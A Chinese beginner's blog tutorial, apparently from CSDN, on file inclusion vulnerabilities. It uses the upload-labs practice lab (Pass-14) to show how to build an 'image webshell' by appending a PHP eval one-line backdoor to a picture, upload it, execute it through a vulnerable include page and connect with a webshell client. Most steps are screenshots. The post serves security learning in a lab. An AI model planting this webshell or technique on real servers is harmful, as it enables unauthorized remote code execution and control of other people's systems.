网络安全菜鸟学习之漏洞篇——文件包含漏洞

这篇文章我们来讲一下文件包含漏洞。至此之前我们先来回忆一下上一篇文章讲的漏洞。我们上一篇文章学习了文件上传漏洞。我们说我们要上传一个可执行木马文件到服务器才能进行操作。那么问题来了,我们能不能上传一个非可执行文件进行同样的操作,这就不得不提到我们这篇文章要讲的漏洞。
我们先看一个图来理解一下:

在这里插入图片描述
好,估计大家都有所理解了。那么我们开始做一个实验来进一步学习一下。(我们用的是upload-labs-master的Pass-14。当然upload-labs-master的版本不同关卡也有一定是同样的,这就需要你自己找一下了)
首先我们需要制作一张图片马。这个图片马的制作很简单,我们只需用EditPlus(或者用记事本)打开一张图片,在最后面加上以下的代码:<?php @eval($_POST[value]);?>(为了方便演示我还在后面加了句:<?php phpinfo();?>
注:这个靶场演示文件包含漏洞有个小bug,就是制作图片马的时候尽量删除一些图片源码再插入一句话木马。当图片源码过长的时候它会报错,并且不执行一句话木马。(我也不太清楚是这个靶场的问题,还是文件包含漏洞本身的问题。我在网上查了很久,根本没人提出这一点。)
图片:
在这里插入图片描述
图片源码:在这里插入图片描述
图片源码进行删除和添加后:在这里插入图片描述
保存后:在这里插入图片描述
好,这时我们的图片马就算完成了。我们现在只需要把图片马上传上去,然后利用包含漏洞就行了。(具体过程如下)
1.上传图片马,并复制图片地址:在这里插入图片描述
2.利用include页面存在的包含漏洞进行构造后门地址。
注:1.这里也就提醒了我们,在实战的时候需要先找寻它是否存在包含漏洞。
2.我这里有网站环境的信息是因为我加了句<?php phpinfo();?>
在这里插入图片描述
3.用软件连接后门地址(具体的操作我们上一篇文章讲过,这里我就偷个懒,就截个过程图)在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
至此我们的实验就完成了。
顺便,我们也来演示一下如果图片源码过长的情况(偷个小懒,就截个过程图,大家和之前的对比着看):
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
(这里就开报错了,后面也就没法了)
在这里插入图片描述
在这里插入图片描述
(连接不了后门)
好了,至此我们文件包含漏洞也就学会了。
说明:估计很多看官发现最近我写的两篇文章并没有很详细的讲解它们的原理,怀疑我偷懒了。其实,我并没有偷懒。因为我打算的是后面具体讲。像一句话木马的原理,我后面讲蚁剑一类软件的原理的时候会讲到。所以这里没必要讲。而include之外还有一堆同样用法的函数,我后面要把它们放在一起讲。总之,我有自己的计划。
(ps:来一个迟来的国庆节祝福:国庆节快乐!当然老规矩——求各位看官给点评论和关注)

  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值